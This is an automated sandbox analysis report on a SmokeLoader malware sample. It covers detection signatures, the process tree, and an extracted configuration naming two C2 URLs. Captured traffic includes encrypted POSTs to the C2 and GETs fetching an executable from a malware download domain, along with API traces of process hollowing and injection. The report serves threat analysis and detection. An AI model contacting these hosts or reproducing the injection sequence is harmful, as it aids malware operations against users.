Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Windows Analysis Report cf71PGrIPQ.exe

Overview

General Information

Sample Name:cf71PGrIPQ.exe
Analysis ID:529748
MD5:19b07bfa4ba4cffba03dff47a9efdf36
SHA1:0629443d410c7ef3cdec3528c257022f4700d062
SHA256:79c00db1607b8f07618ee3f90f5c4e160c7de05bce6380a7de83171e2eac11d4
Tags:exeTeamBot
Infos:

Most interesting Screenshot:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • cf71PGrIPQ.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\cf71PGrIPQ.exe" MD5: 19B07BFA4BA4CFFBA03DFF47A9EFDF36)
    • cf71PGrIPQ.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\cf71PGrIPQ.exe" MD5: 19B07BFA4BA4CFFBA03DFF47A9EFDF36)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • iaivaah (PID: 6324 cmdline: C:\Users\user\AppData\Roaming\iaivaah MD5: 19B07BFA4BA4CFFBA03DFF47A9EFDF36)
    • iaivaah (PID: 6600 cmdline: C:\Users\user\AppData\Roaming\iaivaah MD5: 19B07BFA4BA4CFFBA03DFF47A9EFDF36)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{
  "C2 list": [
    "http://host-data-coin-11.com/",
    "http://file-coin-host-12.com/"
  ]
}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            • AV Detection
            • Compliance
            • Networking
            • Key, Mouse, Clipboard, Microphone and Screen Capturing
            • System Summary
            • Data Obfuscation
            • Persistence and Installation Behavior
            • Hooking and other Techniques for Hiding and Protection
            • Malware Analysis System Evasion
            • Anti Debugging
            • HIPS / PFW / Operating System Protection Evasion
            • Language, Device and Operating System Detection
            • Stealing of Sensitive Information
            • Remote Access Functionality

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configuration
            Source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}
            Multi AV Scanner detection for submitted file
            Source: cf71PGrIPQ.exeVirustotal: Detection: 33%Perma Link
            Source: cf71PGrIPQ.exeReversingLabs: Detection: 47%
            Antivirus detection for URL or domain
            Source: http://privacytoolzforyou-7000.com/downloads/toolspab2.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: privacytoolzforyou-7000.comVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\iaivaahReversingLabs: Detection: 47%
            Machine Learning detection for sample
            Source: cf71PGrIPQ.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\iaivaahJoe Sandbox ML: detected
            Source: cf71PGrIPQ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Binary string: C:\mavonopug\cexegu31\rehe takuruhizet\99\z.pdb source: cf71PGrIPQ.exe, iaivaah.13.dr
            Source: Binary string: VC:\mavonopug\cexegu31\rehe takuruhizet\99\z.pdbP+C source: cf71PGrIPQ.exe, iaivaah.13.dr

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-7000.com
            Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://host-data-coin-11.com/
            Source: Malware configuration extractorURLs: http://file-coin-host-12.com/
            Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
            Source: Joe Sandbox ViewIP Address: 212.193.50.94 212.193.50.94
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Sun, 28 Nov 2021 04:09:32 GMTContent-Type: application/x-msdos-programContent-Length: 323584Connection: closeLast-Modified: Sun, 28 Nov 2021 04:09:01 GMTETag: "4f000-5d1d17bf688fe"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 f0 f7 fb 52 91 99 a8 52 91 99 a8 52 91 99 a8 3d e7 32 a8 7b 91 99 a8 3d e7 07 a8 42 91 99 a8 3d e7 33 a8 31 91 99 a8 5b e9 0a a8 55 91 99 a8 52 91 98 a8 b6 91 99 a8 3d e7 36 a8 53 91 99 a8 3d e7 03 a8 53 91 99 a8 3d e7 04 a8 53 91 99 a8 52 69 63 68 52 91 99 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0f d6 da 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 60 df 02 00 00 00 00 d0 7f 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 e2 02 00 04 00 00 06 45 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 01 03 00 50 00 00 00 00 10 e1 02 20 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 e1 02 cc 17 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e0 e9 dd 02 00 20 03 00 00 62 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 6d 00 00 00 10 e1 02 00 6e 00 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 13 01 00 00 80 e1 02 00 14 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyknc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyknc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.comData Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 59 d8 89 69 23 c8 5e 75 ca 2c 0b 5f 6f 7d b3 99 d1 29 b3 cc 85 af 01 7b 03 1b 70 c5 48 7f f6 7e 2a 5f 77 9d 2e f4 86 6e a9 5e 21 54 50 e9 9b 21 01 50 af 2f f6 c3 69 71 cc aa 74 d9 12 2c 4d d5 2b da 59 f5 80 84 ac dc 34 d2 21 8e 14 48 0a 6e 5b e5 76 89 da 3e ff 8c 15 c2 c3 0c 43 1d 9c b6 dc e7 91 12 59 a1 ee 81 c2 9b 23 5d cb a8 d9 f0 5f 7e 3a 56 17 a0 ae 79 1b 41 c1 81 bd 3a 9a 40 28 31 f6 16 65 aa bc 5b f7 01 b5 3f e6 e3 19 27 d6 64 82 b0 d5 2d 97 da 7f 31 81 Data Ascii: 6A}J2DUwmEu$f]dYi#^u,_o}){pH~*_w.n^!TP!P/iqt,M+Y4!Hn[v>CY#]_~:VyA:@(1e[?'d-1
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyknc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.comData Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 59 d8 89 69 23 c8 5e 75 ca 2c 0b 5f 6f 7d b3 99 d1 29 b3 cc 85 af 01 7b 03 1b 70 c5 48 7f f6 7e 2a 5f 77 9d 2e f4 86 6e a9 5e 21 54 50 e9 9b 21 01 50 af 2f f6 c3 69 71 cc aa 74 d9 12 2c 4d d5 2b da 59 f5 80 84 ac dc 34 d2 21 8e 14 48 0a 6e 5b e5 76 89 da 3e ff 8c 15 c2 c3 0c 43 1d 9c b6 dc e7 91 12 59 a1 ee 81 c2 9b 23 5d cb a8 d9 f0 5f 7e 3a 56 17 a0 ae 79 1b 41 c1 81 bd 3a 9a 40 28 31 f6 16 65 aa bc 5b f7 01 b5 3f e6 e3 19 27 d6 64 82 b0 d5 2d 97 da 7f 31 81 Data Ascii: 6A}J2DUwmEu$f]dYi#^u,_o}){pH~*_w.n^!TP!P/iqt,M+Y4!Hn[v>CY#]_~:VyA:@(1e[?'d-1
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyknc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.comData Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 59 d8 89 69 23 c8 5e 75 ca 2c 0b 5f 6f 7d b3 99 d1 29 b3 cc 85 af 01 7b 03 1b 70 c5 48 7f f6 7e 2a 5f 77 9d 2e f4 86 6e a9 5e 21 54 50 e9 9b 21 01 50 af 2f f6 c3 69 71 cc aa 74 d9 12 2c 4d d5 2b da 59 f5 80 84 ac dc 34 d2 21 8e 14 48 0a 6e 5b e5 76 89 da 3e ff 8c 15 c2 c3 0c 43 1d 9c b6 dc e7 91 12 59 a1 ee 81 c2 9b 23 5d cb a8 d9 f0 5f 7e 3a 56 17 a0 ae 79 1b 41 c1 81 bd 3a 9a 40 28 31 f6 16 65 aa bc 5b f7 01 b5 3f e6 e3 19 27 d6 64 82 b0 d5 2d 97 da 7f 31 81 Data Ascii: 6A}J2DUwmEu$f]dYi#^u,_o}){pH~*_w.n^!TP!P/iqt,M+Y4!Hn[v>CY#]_~:VyA:@(1e[?'d-1
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sremv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sremv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.comData Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 01 b6 b2 00 30 c4 6f 75 b5 1f 73 5a 1c 1c 84 e1 a1 42 ed cb a1 f3 2e 6b 20 7a 5f c3 48 61 f0 0d 29 0b 25 8b 72 93 e5 63 b6 17 78 42 79 f5 b6 64 4f 77 bf 4a f2 b3 4c 3a c0 f9 54 dc 1a 4c 0f 9b 02 cc 3d 8e aa 9f a1 f5 16 84 3f a4 41 21 0f 34 4d d7 54 fb bc 4e eb 86 21 c7 80 30 15 05 c2 99 f3 f2 d7 7a 53 ef 8f fa a3 ac 06 34 87 fa d2 e5 53 4f 1e 7a 22 cb f9 31 0f 17 b4 92 8b 7f d6 51 13 6d d0 0a 54 cf 83 52 af 14 a9 36 b5 de 2e 7a 97 39 e4 a7 cc 6f 97 bc 60 0e bf 05 5b bc be e7 ae 3a c9 fe 3b 6c bf 75 9e aa 5e 6e f4 e4 43 bf 14 de 37 4d 16 65 bb f8 18 45 46 9b e8 6e 39 06 10 51 49 f2 b8 3d 53 bf 39 ba 02 15 1a df fe 28 20 46 b7 70 24 e1 52 95 b4 da d8 6d 83 84 dd 43 9c 34 1d 40 1c eb a6 48 37 a8 32 ed 25 ce 83 95 ab 1e 49 fe cd e8 c0 2c Data Ascii: 6A}J2DUwmEu$f]d0ousZB.k z_Ha)%rcxBydOwJL:TL=?A!4MTN!0zS4SOz"1QmTR6.z9o`[:;lu^nC7MeEFn9QI=S9( Fp$RmC4@H72%I,
            Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.com
            Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 28 Nov 2021 04:08:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 28 Nov 2021 04:09:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%XQAc}yc0
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyknc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
            Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.com
            Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.com

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp, type: MEMORY
            Source: cf71PGrIPQ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00402A5F6_2_00402A5F
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00402AB36_2_00402AB3
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_00402A5F6_1_00402A5F
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_00402AB36_1_00402AB3
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 17_2_0328325317_2_03283253
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 17_2_032831FF17_2_032831FF
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00402A5F21_2_00402A5F
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00402AB321_2_00402AB3
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_00402A5F21_1_00402A5F
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_00402B2E21_1_00402B2E
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00401962 Sleep,NtTerminateProcess,6_2_00401962
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_0040196D Sleep,NtTerminateProcess,6_2_0040196D
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,6_2_00402000
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,6_2_0040250A
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00401A0B NtTerminateProcess,6_2_00401A0B
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,6_2_0040201A
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,6_2_0040201E
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,6_2_0040202D
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00402084 LocalAlloc,NtQuerySystemInformation,6_2_00402084
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00402491 NtOpenKey,6_2_00402491
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,6_1_00402000
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,6_1_0040250A
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,6_1_0040201A
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,6_1_0040201E
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,6_1_0040202D
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_00402084 LocalAlloc,NtQuerySystemInformation,6_1_00402084
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_00402491 NtOpenKey,6_1_00402491
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 17_2_03280110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,17_2_03280110
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00401962 Sleep,NtTerminateProcess,21_2_00401962
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_0040196D Sleep,NtTerminateProcess,21_2_0040196D
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,21_2_00402000
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,21_2_0040250A
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00401A0B NtTerminateProcess,21_2_00401A0B
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,21_2_0040201A
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,21_2_0040201E
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,21_2_0040202D
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00402084 LocalAlloc,NtQuerySystemInformation,21_2_00402084
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00402491 NtOpenKey,21_2_00402491
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,21_1_00402000
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,21_1_0040250A
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,21_1_0040201A
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,21_1_0040201E
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,21_1_0040202D
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_00402084 LocalAlloc,NtQuerySystemInformation,21_1_00402084
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_00402491 NtOpenKey,21_1_00402491
            Source: cf71PGrIPQ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: cf71PGrIPQ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: iaivaah.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: iaivaah.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: cf71PGrIPQ.exeVirustotal: Detection: 33%
            Source: cf71PGrIPQ.exeReversingLabs: Detection: 47%
            Source: cf71PGrIPQ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\cf71PGrIPQ.exe "C:\Users\user\Desktop\cf71PGrIPQ.exe"
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeProcess created: C:\Users\user\Desktop\cf71PGrIPQ.exe "C:\Users\user\Desktop\cf71PGrIPQ.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\iaivaah C:\Users\user\AppData\Roaming\iaivaah
            Source: C:\Users\user\AppData\Roaming\iaivaahProcess created: C:\Users\user\AppData\Roaming\iaivaah C:\Users\user\AppData\Roaming\iaivaah
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeProcess created: C:\Users\user\Desktop\cf71PGrIPQ.exe "C:\Users\user\Desktop\cf71PGrIPQ.exe" Jump to behavior
